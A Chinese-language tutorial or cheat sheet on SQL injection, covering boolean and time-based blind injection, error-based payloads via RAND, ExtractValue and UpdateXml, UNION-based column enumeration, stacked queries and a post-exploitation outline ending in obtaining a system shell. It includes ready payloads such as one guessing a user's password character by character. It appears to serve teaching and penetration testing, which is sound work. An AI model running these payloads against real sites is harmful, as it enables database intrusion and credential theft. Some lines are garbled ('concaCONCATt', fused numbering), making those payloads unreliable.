盲注

关键点是 根据页面返回内容分析 Payload 中的问题是否为真，然后通过多次测试遍历出想要的数据

布尔盲注

目标地址：http://newspaper.com/items.php?id=2

对应的SQL语句：SELECT title, description, body FROM items WHERE ID = 2

然后攻击者尝试返回 false 的查询：http://newspaper.com/items.php?id=2 and 1=2

对应的SQL语句：SELECT title, description, body FROM items WHERE ID = 2 and 1=2

如果网页应用存在 SQL 注入漏洞，那么其可能不会返回数据。为了确认这一点，攻击者会再次注入一次返回 true 的查询：http://newspaper.com/items.php?id=2 and 1=1

如果前后两次查询返回的网页内容不同，攻击者就能够通过组合 Payload 遍历出想要的数据。

时间盲注猜测密码的首字符是否为 ‘2’，是的话等待10秒。

对应 MySQL 语句为 1 UNION SELECT IF(SUBSTRING(user_password,1,1) = CHAR(50),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM users WHERE user_id = 1;

报错注入完整的语句如 SELECT * FROM xxx WHERE id=1 AND ({Payload})，{Payload} 详细内容见下文

关键点是 构造错误信息，让自己想要的数据被输出到错误信息中

RAND

SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

RAND(0) 0为随机函数的种子，该函数产生浮点数v，且v的范围为 0 <= v < 1.0

FLOOR(X) 取不大于 X 的最大整数

FLOOR(RAND(0)*2) 返回 0 或 1

0x3a 是 “:” 的 Unicode，单纯为了拼接好看

CONCAT() 拼接字符串

GROUP BY 按拼接字符串分组

COUNT(*) 记录的总数，这里会阻止 GROUP BY 直接优化得到 0 和 1 的结果

结合以上内容，当 FLOOR(RAND(0)*2) 出现重复值时，数据库会报错，报错信息类似 Error: Duplicate entry ‘5.1.73-0ubuntu0.10.04.1:1’ for key ‘group_key’

这样我们就可以从报错信息中获取到我们想要的信息，这次是数据库版本。

rand 的结果是随机的，也可以选择以下两种函数来构造错误信息。

ExtractValue

Description: 查询 XML 文档的函数

Payload: ExtractValue(1,CONCAT(0x7e,(SELECT version()),0x7e))

Output: - XPATH syntax error: '~5.5.53~'

UpdateXml

Description: 修改 XML 文档的函数

Payload: UpdateXml(1,concaCONCATt(0x7e,(SELECT user()),0x7e),1)

Output: - XPATH syntax error: '~5.5.53~'

UNION 查询注入UNION 语句合并多个 SELECT 语句的结果并返回

关键点：UNION 连接的多个 SELECT 语句中，每一列的数据类型应该相同，且选中相同数量的列。对于 Oracle 数据库，还要求 SELECT 必须使用 FORM 指定一个有效的表名。

确定列的数量使用 ORDER BY

依次使用以下序列中的语句，直到报错，如 The ORDER BY position number 3 is out of range of the number of items in the select list，进而确认列的数量。

1

2

31 ORDER BY 1--

1 ORDER BY 2--

1 ORDER BY 3--

使用 UNION SELECE NULL,...

NULL 可以被转为任意数据类型，所以这里可以用来作为返回值。

依次使用以下序列中的语句，直到报错，如 All queries combined using a UNION, INTERSECT or EXCEPT operator must have an equal number of expressions in their target lists，进而确认列的数量。

1

2

31 UNION SELECT NULL--

1 UNION SELECT NULL,NULL--

1 UNION SELECT NULL,NULL,NULL--

找到字符串类型的列

同样的，可以依次尝试以下序列：

1

2

3

41 UNION SELECT 'a',NULL,NULL,NULL--

1 UNION SELECT NULL,'a',NULL,NULL--

1 UNION SELECT NULL,NULL,'a',NULL--

1 UNION SELECT NULL,NULL,NULL,'a'--

如果对应的列与字符串类型不兼容，就会报错，如 Conversion failed when converting the varchar value ‘a’ to data type int ，所以如果不报错，我们就找到了字符串类型的列。

覆盖原有数据

注入点一般在 WHERE 处，使用 1 AND false UNION SELECT ... 将原有输出覆盖。

堆叠注入

堆叠注入指的是被注入方允许同时执行多条语句，那么攻击者就可以利用额外的语句完成任何操作。

敏感数据

成功注入后，接下来的流程一般是：

获取当前用户/数据库

获取用户名和密码

枚举数据库/表/列

尝试获取系统 shell

结合利用其他漏洞

Reference